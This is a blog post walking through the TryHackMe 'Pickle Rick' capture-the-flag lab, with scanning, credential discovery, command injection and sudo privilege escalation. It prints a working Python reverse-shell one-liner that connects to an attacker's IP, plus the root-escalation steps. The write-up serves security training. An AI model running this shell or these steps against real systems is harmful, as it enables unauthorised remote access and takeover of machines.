
<!doctype html>














<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



  
  
    
    
  <script src="/assets/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="https://cdn.bootcss.com/pace/1.0.2/themes/black/pace-theme-flash.min.css" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="tryhackme,solutions,CTF,command injection,privilege escalation,directory scanning," />








  <link rel="shortcut icon" type="image/x-icon" href="/assets/images/logo.png?v=5.1.1" />
















<meta name="description" content="Pickle Rick is a Rick and Morty themed CTF challenge. It requires you to exploit the webserver and find 3 ingredients that will help Rick make his potion to transform himself back to human from a pickle. This is an easy challenge that can teach you directory scanning, command injection, Sudo privilege escalation, etc.">
<meta name="keywords" content="tryhackme, solutions, CTF, command injection, privilege escalation, directory scanning">
<meta property="og:type" content="article">
<meta property="og:title" content="[TryHackMe] Pickle Rick Walkthrough">
<meta property="og:url" content="http://0.0.0.0:8000/tryhackme/2020/05/15/pickle-rick/">
<meta property="og:site_name" content="n0nu11">
<meta property="og:description" content="Pickle Rick is a Rick and Morty themed CTF challenge. It requires you to exploit the webserver and find 3 ingredients that will help Rick make his potion to transform himself back to human from a pickle. This is an easy challenge that can teach you directory scanning, command injection, Sudo privilege escalation, etc.">
<meta property="og:locale" content="en">
<meta property="og:image" content="/assets/images/picklerick/picklerick2.jpg"> <meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[TryHackMe] Pickle Rick Walkthrough">
<meta name="twitter:description" content="Pickle Rick is a Rick and Morty themed CTF challenge. It requires you to exploit the webserver and find 3 ingredients that will help Rick make his potion to transform himself back to human from a pickle. This is an easy challenge that can teach you directory scanning, command injection, Sudo privilege escalation, etc.">
<meta name="twitter:image" content="https://media.giphy.com/media/9zXWAIcr6jycE/giphy.gif">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '3B1EKV289D',
      apiKey: '61d1a631ee6de5f6dc145efe484b3b9e',
      indexName: 'prod_n0nu11',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://0.0.0.0:8000/"/>





  <title>[TryHackMe] Pickle Rick Walkthrough | n0nu11</title>
  
















</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  

  <div class="container sidebar-position-right page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta custom-logo">
    
      <div class="site-meta-headline">
        <a>
          <img class="custom-logo-image" src="/assets/images/logo.png"
               alt="n0nu11"/>
        </a>
      </div>
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">n0nu11</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">Cybersecurity blog for Writeups, Tutorials, Solutions and Walkthroughs</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://0.0.0.0:8000/tryhackme/2020/05/15/pickle-rick/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="n0nu11">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/assets/images/waseem.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="n0nu11">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">
          
          
            [TryHackMe] Pickle Rick Walkthrough
          
        </h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-15T20:40:18+05:30">
                15-05-2020
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/tryhackme" itemprop="url" rel="index">
                    <span itemprop="name">tryhackme</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            
            




























            <div class="post-wordcount">
              

              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time</span>
                
                <span title="Reading time">
                  3
                </span>
              
            </div>
          

          
            
                <div class="post-description">
                    Pickle Rick is a Rick and Morty themed CTF challenge. It requires you to exploit the webserver and find <b>3</b> ingredients that will help Rick make his potion to transform himself back to human from a pickle. This is an easy challenge that can teach you directory scanning, command injection, Sudo privilege escalation, etc.
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <h1 id="introduction">Introduction</h1>

<p>Pickle Rick is a Rick and Morty themed CTF challenge. It requires you to exploit the webserver and find <strong>3</strong> ingredients that will help Rick make his potion to transform himself back to human from a pickle.</p>

<p>This is an easy challenge that can teach you directory scanning, command injection, Sudo privilege escalation, etc.</p>

<p><img src="https://media.giphy.com/media/9zXWAIcr6jycE/giphy.gif" alt="picklerick" /></p>

<hr />

<h1 id="nmap">Nmap</h1>

<p>let’s start with the Nmap scan.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>nmap <span class="nt">-p-</span> <span class="nt">-A</span> <span class="nt">-T4</span> 10.10.159.88 <span class="nt">-oN</span> nmap/fullscan
</code></pre></td></tr></tbody></table></div></div>

<p><img src="/assets/images/picklerick/picklericknmap.png" alt="nmap" /></p>

<p>This may take a while. Why not grab a juice?</p>

<p><img src="https://media.giphy.com/media/skwCXPNUY1MUU/giphy.gif" alt="juice" /></p>

<p><img src="/assets/images/picklerick/picklericknmap2.png" alt="nmap2" /></p>

<p><strong>SSH</strong> and <strong>Webserver</strong> is open. SSH can wait, let’s check the webserver.</p>

<p><img src="/assets/images/picklerick/picklerick2.png" alt="" /></p>

<p>Nothing interesting here, let’s check the source code!.</p>

<p><img src="/assets/images/picklerick/picklericksource.png" alt="" /></p>

<p>There’s a comment by Rick. His Username is <strong>R1ckRul3s.</strong> Hmmm a username? there’s no login page to use the username. Maybe SSH login?. let’s try it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code>ssh R1ckRul3s@10.10.159.88
</code></pre></td></tr></tbody></table></div></div>

<p><img src="/assets/images/picklerick/picklericksshfail.png" alt="" /></p>

<p>SSH is kicking us out. We cant use SSH now.</p>

<hr />

<h1 id="directory-scanning">Directory Scanning</h1>

<p>Lets fire up the <strong>Dirbuster</strong> and scan the directories. I tried looking for <strong>php</strong> and <strong>txt</strong> files.</p>

<p><img src="/assets/images/picklerick/picklerickds.png" alt="" /></p>

<p><img src="https://media.giphy.com/media/RmfzOLuCJTApa/giphy.gif" alt="" /></p>

<p>We got</p>

<ul>
  <li>robots.txt</li>
  <li>login.php</li>
  <li>portal.php</li>
</ul>

<blockquote>
  <p>Assets and Icons directory had a bunch of GIF and JPEG images with other static files. I tried Steganography against JPEG images but no luck.</p>
</blockquote>

<p>Let’s check <strong>robots.txt</strong> file.</p>

<p><img src="/assets/images/picklerick/picklerickrobots.png" alt="" /></p>

<p><code class="highlighter-rouge">Wubbalubbadubdub</code> ? Interesting, maybe a password? Let’s save it, It may come handy later.</p>

<p><img src="https://media.giphy.com/media/l41lI4bYmcsPJX9Go/giphy.gif" alt="" /></p>

<p>Now lets check <strong>login.php</strong></p>

<p>A login page finally!, let’s try the username <code class="highlighter-rouge">R1ckRul3s</code> and the password <code class="highlighter-rouge">Wubbalubbadubdub</code>.</p>

<p><img src="/assets/images/picklerick/picklericklogin.png" alt="" /></p>

<p>And it worked! We’re in <strong>portal.php</strong></p>

<p><img src="/assets/images/picklerick/picklerickportal.png" alt="" /></p>

<p><img src="https://media.giphy.com/media/i2dE5VvBNxBw4/giphy.gif" alt="" /></p>

<hr />

<h1 id="command-injection">Command Injection</h1>

<p>Remember <strong>portal.php</strong> ?. Its says command panel. Can it run Linux commands?. Let’s check it out.</p>

<p><img src="/assets/images/picklerick/picklerickciid.png" alt="" /></p>

<p>Yes, It does. Let’s check the files.</p>

<p><img src="/assets/images/picklerick/picklerickcils.png" alt="" /></p>

<p><code class="highlighter-rouge">Sup3rS3cretPickl3Ingred.txt</code>? It looks like we found our first ingredient!.</p>

<p>let’s see what’s inside the <code class="highlighter-rouge">Sup3rS3cretPickl3Ingred.txt</code> using <code class="highlighter-rouge">cat</code> command.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code><span class="nb">cat </span>Sup3rS3cretPickl3Ingred.txt
</code></pre></td></tr></tbody></table></div></div>

<p><img src="/assets/images/picklerick/picklerickcatfail.png" alt="" /></p>

<p>Uh oh!. We can’t use <code class="highlighter-rouge">cat</code> command. Let’s try <code class="highlighter-rouge">less</code> command then.</p>

<p><img src="/assets/images/picklerick/picklerickciless.png" alt="" /></p>

<p>Ah! Finally one ingredient found. 2 more to go. Hold on Rick!.</p>

<p><img src="https://media.giphy.com/media/Rgo50jdPhiJRiGQH9C/giphy.gif" alt="" /></p>

<hr />

<h1 id="reverse-shell">Reverse Shell</h1>

<p>Since we have command injection ability, let’s get a reverse shell. Head to <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pentestmonkey reverse shell cheatsheet</a>.</p>

<p>Start a netcat listener in the terminal.</p>

<p><img src="/assets/images/picklerick/picklerickrs.png" alt="" /></p>

<p>and run</p>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1</pre></td><td class="code"><pre class="highlight"><code><span class="n">python3</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;YOUR IP&gt;",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
</code></pre></td></tr></tbody></table></div></div>

<blockquote>
  <p>Python 2 wasn’t available but python 3 was. So I tired reverse shell with python 3.
Replace your IP address with &lt;YOUR IP&gt;</p>
</blockquote>

<p>And we got the shell! 💪</p>

<p><img src="/assets/images/picklerick/picklerickshell1.png" alt="" /></p>

<p>Now let’s find other ingredients.</p>

<p><code class="highlighter-rouge">ls /home</code> revealed the <strong>rick</strong> folder.</p>

<p><img src="/assets/images/picklerick/picklerickshell2.png" alt="" /></p>

<p>let’s check the /rick folder.</p>

<p><img src="/assets/images/picklerick/picklerickshell3.png" alt="" /></p>

<p>Huh! the second ingredient. cool.</p>

<p><img src="/assets/images/picklerick/picklerickshell4.png" alt="" /></p>

<p>The 2nd Ingredient is <strong>1 jerry tear</strong>.</p>

<blockquote>
  <p>I checked for 3rd ingredient but unfortunately i can’t able to find it. It seems like it is hidden inside /root folder. We need the root access to get the 3rd ingredient.</p>
</blockquote>

<h1 id="privilege-escalation">Privilege Escalation</h1>

<p>Let’s check if we have any root access.</p>

<p><code class="highlighter-rouge">sudo -l</code></p>

<p><img src="/assets/images/picklerick/picklerickshell5.png" alt="" /></p>

<p><code class="highlighter-rouge">sudo -l</code> shows that we can run any command as root without password. Hurray!</p>

<p><img src="https://media.giphy.com/media/5VKbvrjxpVJCM/giphy.gif" alt="wow" /></p>

<p>Let’s get the root shell now.</p>

<p><code class="highlighter-rouge">sudo /bin/bash</code></p>

<p><img src="/assets/images/picklerick/pickleshell6.png" alt="" /></p>

<p>Finally we have root access!</p>

<p>Let’s find the 3rd ingredient to save Rick!.</p>

<p><img src="/assets/images/picklerick/picklerickshell7.png" alt="" /></p>

<p>As I thought there’s the 3rd ingredient. Let’s get it!.</p>

<p><img src="/assets/images/picklerick/picklerickshell8.png" alt="" /></p>

<p>We got all the 3 ingredients. Time to save Rick.</p>

<p><img src="/assets/images/picklerick/picklerickfinal.png" alt="" /></p>

<p>And we are Done!. Hurray!</p>

<p><img src="https://media.giphy.com/media/l41JU9pUyosHzWyuQ/giphy.gif" alt="done" /></p>

<hr />

<h1 id="summary">Summary</h1>

<ul>
  <li>Nmap scan showed 2 ports open, 22 (ssh), and 80 (webserver).</li>
  <li>SSH denied access for any credentials making it useless for this challenge.</li>
  <li>port 80 is up and running. checking its source revealed the username.</li>
  <li>The Directory Scanner against webserver revealed login.php,robots.txt,portal.php</li>
  <li>The robots.txt file revealed the password.</li>
  <li>The credentials obtained are used in login.php which redirected to portal.php on successful login.</li>
  <li>portal page had command injection vulnerability which then used to get the 1st ingredient.</li>
  <li>A reverse shell is obtained using command injection.</li>
  <li>The home directory contained a rick folder which then contained the 2nd ingredient.</li>
  <li>sudo -l command revealed that we can run any command as root without password.</li>
  <li>sudo /bin/bash to obtain a root shell.</li>
  <li>The /root folder contained the 3rd ingredient.</li>
</ul>

<h1 id="before-you-leave">Before you leave</h1>

<p>If you have any constructive criticism or any questions, please drop an email at root@n0nu11.tech or ping me in <a href="https://instagram.com/dvlp.er">instagram</a>. I’ll be happy to hear your feedback.</p>

<p>Follow me on  <a href="https://github.com/devwaseem"> <i class="fa fa-github"></i> Github</a>, <a href="https://twitter.com/iamwaseem99"><i class="fa fa-twitter"></i> Twitter</a>, <a href="https://www.instagram.com/dvlp.er/"><i class="fa fa-instagram"></i> Instagram</a>, <a href="https://www.facebook.com/dvlprwaseem"><i class="fa fa-facebook"></i> Facebook</a>, <a href="https://www.linkedin.com/in/devwaseem/"><i class="fa fa-linkedin"></i> LinkedIn</a>.</p>

<p><img src="https://media.giphy.com/media/TfFDiw5gBuEns4ykJl/giphy.gif" alt="bye" /></p>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/tryhackme" rel="tag"># tryhackme</a>
          
            
            <a href="/tag/#/solutions" rel="tag"># solutions</a>
          
            
            <a href="/tag/#/CTF" rel="tag"># CTF</a>
          
            
            <a href="/tag/#/command%20injection" rel="tag"># command injection</a>
          
            
            <a href="/tag/#/privilege%20escalation" rel="tag"># privilege escalation</a>
          
            
            <a href="/tag/#/directory%20scanning" rel="tag"># directory scanning</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/personal/2020/05/13/init5-how-it-all-started/" rel="prev" title="Init 5: How it all started">
                Init 5: How it all started <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/assets/images/waseem.jpg"
               alt="n0nu11" />
          <p class="site-author-name" itemprop="name">n0nu11</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        
        
        

        <div class="links-of-author motion-element">
          
            
              
              
              <span class="links-of-author-item">
                <a href="mailto:root@n0nu11.tech" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                  Email
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://github.com/devwaseem" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://twitter.com/iamwaseem99" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://www.linkedin.com/in/devwaseem/" target="_blank" title="LinkedIn">
                  
                    <i class="fa fa-fw fa-linkedin"></i>
                  
                  LinkedIn
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://www.facebook.com/dvlprwaseem" target="_blank" title="Facebook">
                  
                    <i class="fa fa-fw fa-facebook"></i>
                  
                  Facebook
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://www.instagram.com/dvlp.er" target="_blank" title="Instagram">
                  
                    <i class="fa fa-fw fa-instagram"></i>
                  
                  Instagram
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://tryhackme.com/p/r3d4ng37" target="_blank" title="TryHackMe">
                  
                    <i class="fa fa-fw fa-bug"></i>
                  
                  TryHackMe
                </a>
              </span>
            
              
              
              <span class="links-of-author-item">
                <a href="https://www.hackthebox.eu/profile/273182" target="_blank" title="HackTheBox">
                  
                    <i class="fa fa-fw fa-bug"></i>
                  
                  HackTheBox
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#introduction"> <span class="nav-number">1</span> <span class="nav-text">Introduction</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#nmap"> <span class="nav-number">2</span> <span class="nav-text">Nmap</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#directory-scanning"> <span class="nav-number">3</span> <span class="nav-text">Directory Scanning</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#command-injection"> <span class="nav-number">4</span> <span class="nav-text">Command Injection</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#reverse-shell"> <span class="nav-number">5</span> <span class="nav-text">Reverse Shell</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#privilege-escalation"> <span class="nav-number">6</span> <span class="nav-text">Privilege Escalation</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#summary"> <span class="nav-number">7</span> <span class="nav-text">Summary</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#before-you-leave"> <span class="nav-number">8</span> <span class="nav-text">Before you leave</span> </a> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="author" itemprop="copyrightHolder">Waseem Akram - Made with</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">in india</span>
  
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  











  




  

    

  







  





  
  
  
  <link rel="stylesheet" href="/assets/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/assets/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/assets/js/src/algolia-search.js?v=5.1.1"></script>



  

  

  
  


  

  
  <script type="text/javascript" src="/assets/js/src/js.cookie.js?v=5.1.1"></script>
  <script type="text/javascript" src="/assets/js/src/scroll-cookie.js?v=5.1.1"></script>


  
  <script type="text/javascript" src="/assets/js/src/exturl.js?v=5.1.1"></script>


</body>
</html>

